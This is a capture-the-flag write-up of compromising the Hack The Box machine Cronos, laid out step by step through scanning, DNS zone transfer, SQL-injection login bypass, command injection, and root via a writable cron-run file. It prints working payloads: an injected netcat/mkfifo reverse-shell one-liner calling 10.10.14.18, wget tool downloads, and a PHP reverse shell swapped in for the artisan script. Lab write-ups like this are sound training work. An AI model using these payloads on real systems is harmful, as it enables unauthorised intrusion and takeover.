Cronos
Contents
Ports scan
505@kali:~/HTB/Machines/Chronos$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.13
Starting masscan 1.0.5 at 2020-03-18 13:08:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.13 Discovered open port 53/udp on 10.10.10.13 Discovered open port 53/tcp on 10.10.10.13 Discovered open port 80/tcp on 10.10.10.13
u505@kali:~/HTB/Machines/Chronos$ nmap -sC -sV 10.10.10.13 Starting Nmap 7.80 at 2020-03-18 09:08 EDT Nmap scan report for crhonos.htb (10.10.10.13) Host is up (0.046s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.38 seconds
Port 53
The DNS transfer is allowed and gives us the list of hosts names.
u505@kali:~/HTB/Machines/Chronos$ dig @10.10.10.13 axfr cronos.htb
; <<>> DiG 9.11.16-2-Debian <<>> @10.10.10.13 axfr cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 44 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) ;; WHEN: Wed Mar 18 09:35:31 EDT 2020 ;; XFR size: 7 records (messages 1, bytes 203)
u505@kali:~/HTB/Machines/Chronos$ cat /etc/hosts | grep "10.10.10.13 " 10.10.10.13 cronos.htb cronos admin.cronos.htb ns1.cronos.htb www.cronos.htb
Port 80
10.10.10.13
This is the apache default page. Dirsearch didn't find anything else neither.
u505@kali:~/HTB/Machines/Chronos$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "html,txt" -f -t 50 -u http://10.10.10.13
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: html, txt | HTTP method: get | Threads: 50 | Wordlist size: 13784
Error Log: /opt/utils/dirsearch/logs/errors-20-03-18_09-12-46.log
Target: http://10.10.10.13
[09:12:47] Starting: [09:12:49] 403 - 291B - /.html [09:13:05] 403 - 292B - /icons/ [09:13:05] 200 - 12KB - /index.html [09:13:20] 403 - 300B - /server-status/
Task Completed
www.cronos.htb and cronos.htb
This web page doesn't provide us useful information neither.
u505@kali:~/HTB/Machines/Chronos$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "html,txt,php" -f -t 50 -u http://cronos.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 18379
Error Log: /opt/utils/dirsearch/logs/errors-20-03-18_09-41-04.log
Target: http://cronos.htb
[09:41:05] Starting: [09:41:05] 403 - 290B - /.html [09:41:05] 403 - 289B - /.php [09:41:20] 200 - 925B - /css/ [09:41:26] 403 - 291B - /icons/ [09:41:26] 200 - 2KB - /index.php [09:41:26] 200 - 2KB - /index.php/ [09:41:27] 200 - 924B - /js/ [09:41:35] 200 - 24B - /robots.txt [09:41:36] 403 - 299B - /server-status/
Task Completed
admin.cronos.htb
The web page is a php login screen.
u505@kali:~/HTB/Machines/Chronos$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "html,txt,php" -f -t 50 -u http://admin.cronos.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 18379
Error Log: /opt/utils/dirsearch/logs/errors-20-03-18_09-41-22.log
Target: http://admin.cronos.htb
[09:41:22] Starting: [09:41:23] 403 - 295B - /.php [09:41:26] 403 - 296B - /.html [09:41:31] 200 - 0B - /config.php [09:41:37] 403 - 297B - /icons/ [09:41:37] 200 - 3KB - /index.php [09:41:37] 200 - 3KB - /index.php/ [09:41:39] 302 - 0B - /logout.php -> index.php [09:41:47] 403 - 305B - /server-status/ [09:41:47] 302 - 0B - /session.php -> index.php [09:41:55] 302 - 439B - /welcome.php -> index.php
Task Completed
The pages redirect toward the index page, inclusive the page welcome, but this last one is not empty.
u505@kali:~/HTB/Machines/Chronos$ curl -v http://admin.cronos.htb/welcome.php * Trying 10.10.10.13:80... * TCP_NODELAY set * Connected to admin.cronos.htb (10.10.10.13) port 80 (#0) > GET /welcome.php HTTP/1.1 > Host: admin.cronos.htb > User-Agent: curl/7.68.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Date: Wed, 18 Mar 2020 13:47:23 GMT < Server: Apache/2.4.18 (Ubuntu) < Set-Cookie: PHPSESSID=1pp39qvi5r0fbpjphbdcppvjj1; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < location: index.php < Content-Length: 439 < Content-Type: text/html; charset=UTF-8 < <html"> <br> <head> <title>Net Tool v0.1 </title> </head> <br> <body> <h1>Net Tool v0.1</h1> <form method="POST" action=""> <select name="command"> <option value="traceroute">traceroute</option> <option value="ping -c 1">ping</option> </select> <input type="text" name="host" value="8.8.8.8"/> <input type="submit" value="Execute!"/> </form> <p><a href = "logout.php">Sign Out</a></p> </body> <br> </html> * Connection #0 to host admin.cronos.htb left intact
The welcome page redirects to the index page, but the server transmit the protected page without authentication.
By pass the authentication by SQL injection
This authentication form is vulnerable to a tautological SQL injection. If we enter the user as admin' or '1'='1, the authentication is bypassed.
By pass the authentication tampering the server response (alternative way)
As seen during the enumeration, the server responds a 302 code but servers the page anyway. Tampering the response, we can also by-pass the authentication.
With BURP we intercept the response, and change the code 302 by 200, and remove the header location.
And the protected page appears.
Gain reverse shell
The form contains 2 commands traceroute and ping, traceroute doesn't seem to do anything but ping answers with the output of a ping
Manipulating the host field, we can execute more commands after the traceroute or the ping.
Because, we can by-pass the authentication, we can manipulate the host field from command line.
u505@kali:~/HTB/Machines/Cronos$ curl -X POST --data-binary 'command=traceroute&host=8.8.8.8%3B+whoami' http://admin.cronos.htb/welcome.php <html"> <br> <head> <title>Net Tool v0.1 </title> </head> <br> <body> <h1>Net Tool v0.1</h1> <form method="POST" action=""> <select name="command"> <option value="traceroute">traceroute</option> <option value="ping -c 1">ping</option> </select> <input type="text" name="host" value="8.8.8.8"/> <input type="submit" value="Execute!"/> </form> www-data<br> <p><a href = "logout.php">Sign Out</a></p> </body> <br> </html> <br>
Reverse shell
Listener:
u505@kali:~/HTB/Machines/Cronos$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Send command to open shell
u505@kali:~/HTB/Machines/Cronos$ . /opt/utils/urlencode/gistfile1.sh
u505@kali:~/HTB/Machines/Cronos$ curl -X POST --data-binary "command=traceroute&host=`urlencode "8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 4444 >/tmp/f"`" http://admin.cronos.htb/welcome.php
And the reverse shell is opened
u505@kali:~/HTB/Machines/Cronos$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:57320. /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@cronos:/var/www/admin$ stty raw -echo stty raw -echo www-data@cronos:/var/www/admin$ whoami www-data
User Flag
From the user www-data, we can access the user flag.
www-data@cronos:/var/www/admin$ ls -l /home/noulis total 4 -r--r--r-- 1 noulis noulis 33 Mar 22 2017 user.txt www-data@cronos:/var/www/admin$ cat /home/noulis/user.txt <USER_FLAG>
Elevation of privileges
Upload pspy and LinEnum
Copy the tools to the www folder, and start the web server.
u505@kali:~/HTB/Machines/Cronos$ cd www/ u505@kali:~/HTB/Machines/Cronos/www$ cp /opt/utils/pspy/pspy64 ./ u505@kali:~/HTB/Machines/Cronos/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Cronos/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the victim host
www-data@cronos:/var/www/admin$ cd /dev/shm www-data@cronos:/dev/shm$ wget -q http://10.10.14.18/pspy64 www-data@cronos:/dev/shm$ wget -q http://10.10.14.18/LinEnum.sh www-data@cronos:/dev/shm$ chmod +x pspy64 LinEnum.sh
Cronjob
LinEnum snoops an interesting cron job
www-data@cronos:/dev/shm$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 #
This job is easily detectable by pspy64
2020/03/21 02:57:01 CMD: UID=0 PID=5929 | php /var/www/laravel/artisan schedule:run 2020/03/21 02:57:01 CMD: UID=0 PID=5928 | /bin/sh -c php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 2020/03/21 02:57:01 CMD: UID=0 PID=5927 | /usr/sbin/CRON -f 2020/03/21 02:57:01 CMD: UID=0 PID=5935 | grep columns 2020/03/21 02:57:01 CMD: UID=0 PID=5933 | sh -c stty -a | grep columns
The file artisan is called by root. And www-data is the owner of the file.
www-data@cronos:/dev/shm$ ls -l /var/www/laravel/artisan -rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 /var/www/laravel/artisan
Root reverse shell modifying artisan file
We place a php reverse shell in the www folder
u505@kali:~/HTB/Machines/Cronos/www$ cp /usr/share/webshells/php/php-reverse-shell.php ./ u505@kali:~/HTB/Machines/Cronos/www$ grep CHANGE php-reverse-shell.php $ip = '10.10.14.18'; // CHANGE THIS $port = 4446; // CHANGE THIS
We raise the listener
u505@kali:~/HTB/Machines/Cronos/www$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
And upload the reverse shell to the target.
www-data@cronos:/dev/shm$ cd /var/www/laravel/ www-data@cronos:/var/www/laravel$ wget -q http://10.10.14.18/php-reverse-shell.php
And we replace the artisan file with our reverse shell.
www-data@cronos:/var/www/laravel$ mv artisan artisan.org www-data@cronos:/var/www/laravel$ mv php-reverse-shell.php artisan
Once the crontab runs, we gain the reverse shell.
u505@kali:~/HTB/Machines/Cronos/www$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:54940. Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 03:07:01 up 6:09, 0 users, load average: 0.10, 0.03, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can't access tty; job control turned off # python -c 'import pty; pty.spawn("/bin/bash")' root@cronos:/# stty raw -echo stty raw -echo
And we restore the artisan file.
www-data@cronos:/var/www/laravel$ mv artisan php-reverse-shell.php www-data@cronos:/var/www/laravel$ mv artisan.org artisan
Root flag
root@cronos:/# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 20:58, 18 March 2020 (EDT)
